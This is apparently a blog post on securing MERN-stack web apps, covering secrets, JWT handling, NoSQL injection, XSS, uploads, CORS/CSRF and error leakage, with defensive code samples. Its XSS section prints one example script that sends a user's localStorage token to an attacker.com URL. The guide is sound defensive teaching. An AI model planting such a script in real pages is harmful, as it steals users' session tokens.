
From MERN to Secure MERN: How to Stop Getting Hacked in Your Side Projects
If you've built more than one MERN side project, there's a high chance at least one of them is quietly vulnerable right now.
Not because you're "bad at security", but because most tutorials simply don't care.
They teach you how to make things work.
Attackers only care about how to make things break.
In this post, I'll walk through how a normal MERN stack turns into a Secure MERN stack, using real-world mistakes I keep seeing in student projects, portfolio apps, and even production startups.
I'll keep it practical: what you're probably doing today, how it can be abused, and what you should do instead.
1. Environment variables: Stop leaking your secrets to GitHub
The usual MERN reality
Typical .env setup in a side project:
- You hardcode secrets in the code during dev.
- You later move them to `.env`, but you:
  - Forget to add `.env` to `.gitignore`, or
  - Commit `.env` once "by mistake", then delete it later thinking it's gone, or
  - Put secrets in `config.js` and import that everywhere.
Result: your MongoDB URI, JWT secret, Cloudinary keys, and even SMTP passwords end up in a public repo at least once.
Attackers actively scan GitHub for this. They don't need to target you personally; they just search for patterns like `mongodb+srv://` or `AIzaSy` (the Google API key prefix) and farm credentials.
What can go wrong?
- Your MongoDB is exposed to the internet with a weak or no IP whitelist.
- An attacker connects directly, dumps your entire user database, and maybe even deletes it.
- If you reuse the same password elsewhere, they pivot.
What to actually do
- Always have `.env` in `.gitignore` from day zero.
- Never commit secrets, even once. Git history keeps them unless you rewrite history.
- Use different secrets per environment (local, staging, production).
- For serious deployments: use environment variable stores (Railway, Render, Vercel, AWS Parameter Store, etc.) instead of `.env` files lying around on random servers.
A quick rule: If your app needs it to talk to a third-party service or sign tokens, consider it secret. It should not live in your source code.
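One way to make that rule stick is to load secrets in one place and fail fast at startup when something is missing, instead of crashing later with a cryptic error. Here's a minimal sketch; the variable names (`MONGO_URI`, `JWT_SECRET`) are examples, not a prescribed convention:

```js
// Fail fast at startup if a required secret is missing from the environment.
function loadConfig(env = process.env) {
  const required = ['MONGO_URI', 'JWT_SECRET'];
  const missing = required.filter((key) => !env[key]);
  if (missing.length > 0) {
    throw new Error(`Missing required env vars: ${missing.join(', ')}`);
  }
  return {
    mongoUri: env.MONGO_URI,
    jwtSecret: env.JWT_SECRET,
    port: Number(env.PORT) || 5000,
  };
}

// Usage at the top of your server entry point:
// const config = loadConfig();
```

The point: the rest of the codebase imports `config`, never `process.env` directly, so there's exactly one place to audit.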
2. JWT and auth: Tokens are not just base64 strings
The usual MERN reality
Most MERN tutorials do something like this:
- User logs in with email/password.
- Server generates a JWT with `_id`, maybe `email`, signs it with a hardcoded `JWT_SECRET` like `"mysecret"`, and returns it.
- Frontend stores the token in `localStorage` and sends it in `Authorization: Bearer <token>` for protected routes.
Done. Auth.
In real life, this is very breakable.
What can go wrong?
- Weak or guessable JWT secret
  If your secret is short or in the code, someone with the token can brute-force the secret and forge valid tokens.
- No expiry or long expiry
  Tokens that never expire mean:
  - A stolen laptop = permanent account compromise.
  - A leaked token in logs or screenshots = long-term access.
- `localStorage` + XSS = game over
  If you have any XSS vulnerability (more on this later), an attacker can grab your token from `localStorage` and send it to their server.
What to actually do
- Use a long, random JWT secret stored in environment variables.
- Always set a reasonable expiry (like 15 minutes–1 hour for access tokens).
- Consider:
  - Access token (short-lived) + refresh token pattern.
  - HTTP-only cookies for tokens (prevents JavaScript from reading them, mitigating token theft via XSS).
- On logout or password change:
  - Invalidate or rotate tokens server-side when possible (e.g., track token version in DB).
A simple upgrade: store JWT in an HTTP-only cookie, and use CSRF protection alongside it. That alone raises the bar massively for casual attacks.
3. MongoDB queries: How your filters become injection points
The usual MERN reality
A typical Node + MongoDB route:
```js
// Find user by email
const user = await User.findOne({ email: req.body.email });
```
Looks harmless, right?
The problem starts when you allow clients to send arbitrary filters or sort options.
Example:
```js
// Dangerously trusting client input
const users = await User.find(req.body.filter);
```
If `req.body.filter` is something like:

```js
{ "role": { "$eq": "admin" } }
```

That might be okay.
But if you accidentally allow operators like `$ne` or `$where`, or just pass unchecked JSON into queries, you're asking for trouble.
What can go wrong?
- NoSQL injection: attacker sends crafted query objects to bypass checks or exfiltrate more data than intended.
- If you use `eval`-like features (`$where` with JS expressions), it's even worse.
What to actually do
- Strictly validate and sanitize input before it reaches Mongo queries.
- Use schemas and validation with tools like Joi, Zod, or built-in Mongoose validation:
- Explicitly specify allowed fields.
- Reject unexpected keys and operators.
- Never allow raw objects from the client to be passed directly into `find`, `update`, etc.
A good mindset: Your API decides the shape of filters, not the frontend.
E.g., accept explicit query params: `?role=user&limit=10&page=2` instead of sending arbitrary JSON filters.
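That mindset can be sketched as a small whitelist-based filter builder. The field names and allowed values here (`role`, `status`) are hypothetical; the point is that the API, not the client, decides what a filter can contain:

```js
// Build a Mongo filter from explicit, whitelisted query params instead of
// trusting arbitrary client JSON. Field names and values are examples.
const ALLOWED_FILTERS = {
  role: ['user', 'admin'],
  status: ['active', 'banned'],
};

function buildFilter(query) {
  const filter = {};
  for (const [field, allowedValues] of Object.entries(ALLOWED_FILTERS)) {
    const value = query[field];
    // Only plain strings from the known list are accepted; injected
    // objects like { "$ne": null } fail the typeof check outright.
    if (typeof value === 'string' && allowedValues.includes(value)) {
      filter[field] = value;
    }
  }
  return filter;
}
```

Unknown keys are silently dropped, so a request with `?hacker=1` can never smuggle an operator into `User.find(...)`.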
4. XSS: Your React app is not magically safe
The usual MERN reality
Many devs think: "I use React, so I'm safe from XSS."
Then they do this:
```jsx
<div dangerouslySetInnerHTML={{ __html: userContent }} />
```
Or they show user-generated content from a rich text editor or markdown renderer without proper sanitization.
What can go wrong?
If userContent contains:
```html
<script>
  fetch('https://attacker.com/steal?token=' + localStorage.getItem('token'))
</script>
```
Then any user visiting that page runs that script.
Tokens, cookies (if not HTTP-only), and any accessible data can be exfiltrated.
Even if you never use dangerouslySetInnerHTML, third-party components and markdown renderers can still be misconfigured and vulnerable.
What to actually do
- Avoid `dangerouslySetInnerHTML` unless you absolutely must use it.
- When you must render HTML or markdown:
  - Use a sanitization library (DOMPurify, for example).
  - Strip or escape scripts, inline event handlers, `javascript:` URLs, etc.
- Treat any content that came from a user or external source as hostile until sanitized.
Rule of thumb: if the browser is going to interpret it as HTML, you sanitize it.
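For the common case where user content should be displayed as plain text (usernames, comments without rich formatting), escaping is enough. A minimal helper, to illustrate the idea; if you need to allow real HTML, reach for a proper sanitizer like DOMPurify instead, since escaping alone defeats the purpose of rich text:

```js
// Escape the five characters that let text break out into HTML.
// For plain-text display only; rich text needs a real sanitizer.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```

Note that React's normal `{userContent}` interpolation already does this for you; the helper matters when you're templating HTML yourself (emails, server-rendered snippets).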
5. File uploads: Your image upload route is a landmine
The usual MERN reality
You add image upload for profile pictures or blog covers using multer or similar:
- Accept a file.
- Save it to `/uploads`.
- Store its path in MongoDB.
- Serve it statically.
You've just opened an attack surface that can go very wrong if you're not careful.
What can go wrong?
- An attacker uploads a `.php`, `.js`, or some other executable file and manages to get it executed (more common in PHP stacks, but still dangerous logic-wise).
- Uploading extremely large files to cause disk or memory issues (DoS).
- Uploading files with HTML/JS and then having them served as text/html.
What to actually do
- Validate:
  - File type (MIME type and extension, but don't trust just the extension).
  - File size (limit to something sane like 2–5 MB for images).
- Store user uploads in object storage (S3, Cloudinary, etc.) instead of your app server's file system.
- Serve them from a different domain or subdomain if possible (to limit attacks via cookies or scripts).
- Never execute or interpret user-uploaded files as code.
For portfolio projects, using Cloudinary or similar is easy and dramatically safer than rolling your own file hosting.
6. CORS, cookies, and CSRF: Your frontend and backend are in a relationship… and it's complicated
The usual MERN reality
A common pattern:
- Backend on `http://localhost:5000`
- Frontend on `http://localhost:3000`
You quickly add:
```js
app.use(cors({ origin: 'http://localhost:3000', credentials: true }));
```
Then in production, you change it to something like `origin: '*'` because "CORS errors are annoying".
What can go wrong?
- Wildcard CORS (`*`) with credentials is not allowed by browsers, but CORS misconfigurations often result in the API being callable from anywhere.
- If you rely on cookies for auth and don't use CSRF protection, a user logged into your app can be tricked into making state-changing requests (like changing email, password, or deleting data) via a malicious page.
What to actually do
- For CORS:
  - Whitelist only the domains you actually own.
  - Avoid `*` for anything involving auth.
- For cookies:
  - Use `HttpOnly`, `Secure`, and `SameSite` flags appropriately.
- For CSRF protection:
  - Use CSRF tokens for state-changing operations if you rely on cookies.
  - Or use the double-submit cookie or other standard patterns.
The goal: only your trusted frontend should be able to perform sensitive actions on behalf of the user.
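An origin whitelist is a few lines. This sketch uses the callback shape the popular `cors` middleware accepts for its `origin` option; the domains are placeholders for your own:

```js
// Explicit origin whitelist for CORS. Domains here are example values.
const ALLOWED_ORIGINS = new Set([
  'https://myapp.com',
  'https://www.myapp.com',
]);

function corsOrigin(origin, callback) {
  // `origin` is undefined for same-origin or non-browser requests (curl, etc.),
  // so those are allowed through; browsers always send it cross-origin.
  if (!origin || ALLOWED_ORIGINS.has(origin)) {
    callback(null, true);
  } else {
    callback(new Error('Not allowed by CORS'));
  }
}

// Usage, assuming the `cors` package:
// app.use(cors({ origin: corsOrigin, credentials: true }));
```

In dev you can add `http://localhost:3000` to the set behind an environment check, instead of loosening production config.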
7. Logging, error handling, and "please don't leak your stack trace"
The usual MERN reality
In dev, you send detailed error messages back to the frontend so you can debug quickly:
```js
res.status(500).json({ error: err.message, stack: err.stack });
```
Then you forget to change this in production.
Or you log sensitive data (passwords, tokens, OTPs) to the console or a logging service.
What can go wrong?
- Users (and attackers) see:
  - Your stack traces.
  - File paths.
  - Internal logic details.
- Logs can become a goldmine of:
  - Tokens.
  - Secrets.
  - Personally identifiable information (PII).
What to actually do
- Separate error responses:
  - Dev: detailed logs locally.
  - Prod: generic user-facing error messages, detailed logs only on the server side (not sent to clients).
- Redact sensitive fields before logging.
- Centralize logs if possible, but always treat logs as sensitive data.
If an attacker sees your stack traces and query failures, they can often pivot to find even more weaknesses.
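The dev/prod split can be made explicit in one helper so you can't "forget to change it". A sketch, assuming you branch on `NODE_ENV`:

```js
// Shape an error response by environment: detailed in dev, generic in prod.
function errorResponse(err, nodeEnv = process.env.NODE_ENV) {
  if (nodeEnv === 'production') {
    // Log err.stack server-side here (e.g., to your logging service),
    // but never include it in the response body.
    return { status: 500, body: { error: 'Something went wrong' } };
  }
  return { status: 500, body: { error: err.message, stack: err.stack } };
}

// Usage in an Express error-handling middleware:
// app.use((err, req, res, next) => {
//   const { status, body } = errorResponse(err);
//   res.status(status).json(body);
// });
```

Because the branching lives in one function, switching environments is a deploy-time setting, not a code change you have to remember.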
8. A simple mental model: Secure MERN as a checklist
When you're building side projects, you don't need "perfect" security.
You need non-trivial security — enough that a random person or bot doesn't pwn your app in 5 minutes.
Here's a quick Secure MERN checklist you can gradually adopt:
- Secrets: all secrets in environment variables, never in Git.
- Auth: strong JWT secret, expiry, and preferably HTTP-only cookies.
- Input: validate and sanitize all user input, especially anything touching queries.
- Frontend: no unsafe HTML rendering without sanitization.
- Uploads: validate file type/size, use external storage.
- CORS & CSRF: strict origins, CSRF protection when using cookies.
- Errors & logs: no sensitive info in responses, careful logging.
Pick one project you've already built and audit it using this list.
You'll probably find at least 3–5 things you can fix in under an hour — and that's your upgrade from "MERN" to "Secure MERN".
Final thoughts
Security isn't something you "add at the end".
It's more like code style: the earlier you internalize it, the less painful your future will be.
You don't need to become a full-time security engineer to build safer apps.
You just need to stop doing a few very common, very fixable things.
If you want, send me one of your existing MERN projects (repo or tech stack + features), and I can walk you through a mini threat-model + fix list tailored to your app.